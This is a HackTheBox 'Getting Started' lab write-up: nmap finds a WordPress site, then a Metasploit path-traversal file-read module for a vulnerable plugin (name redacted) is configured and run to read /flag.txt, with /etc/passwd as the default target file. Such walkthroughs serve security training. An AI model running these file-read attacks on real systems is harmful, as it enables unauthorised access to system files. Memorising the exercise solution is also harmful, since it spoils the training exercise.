Public Exploits
ℹ️ Informations¶
- 🌐 Website: HackTheBox
 - 📚 Module: Getting Started
 - 🔗 Link: Public Exploits
 
❓Question¶
Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
📋 Walkthrough¶
Run nmap scan:
We get this result:PORT      STATE SERVICE VERSION
45441/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Getting Started – Just another WordPress site
|_http-generator: WordPress 5.6.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
****** ****** Plugin 2.*.* for W********. We can try to search online an exploit for this plugin. It seems to be vulnerable. We will try to exploit it using Metasploit Framework (as the module want to).  Search for that plugin msf6> search ***** plugin w********
 #  Name                                               Disclosure Date  Rank    Check  Description
   -  ----                                               ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/wp_******_******_file_read  .                normal  No     WordPress ****** ****** File Read Vulnerability
msf6> use 0
msf6 auxiliary(scanner/http/wp_******_******_file_read) >
msf6 auxiliary(scanner/http/wp_******_******_file_read) > show options
Module options (auxiliary/scanner/http/wp_******_******_file_read):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /etc/passwd      yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
                                         html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host
RHOST (Remote Host), RPORT (Remote Port) and FILEPATH because the question say the flag is in /flag.txt msf6 auxiliary(scanner/http/wp_******_******_file_read) > set rhosts [IP]
rhosts => [IP]
msf6 auxiliary(scanner/http/wp_******_******_file_read) > set rport 45441
rport => 45441
msf6 auxiliary(scanner/http/wp_******_******_file_read) > set filepath /flag.txt
filepath => /flag.txt
msf6 auxiliary(scanner/http/wp_******_******_file_read) > 
show options if all is ok msf6 auxiliary(scanner/http/wp_******_******_file_read) > show options
Module options (auxiliary/scanner/http/wp_******_******_file_read):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /flag.txt        yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     [IP]    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
                                         html
   RPORT      45441            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host
msf6 auxiliary(scanner/http/wp_******_******_file_read) > run
[+] File saved in: /home/kali/.msf4/loot/20240824125258_default_94.237.49.212_simplebackup.tra_781127.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Answer
HTB{************}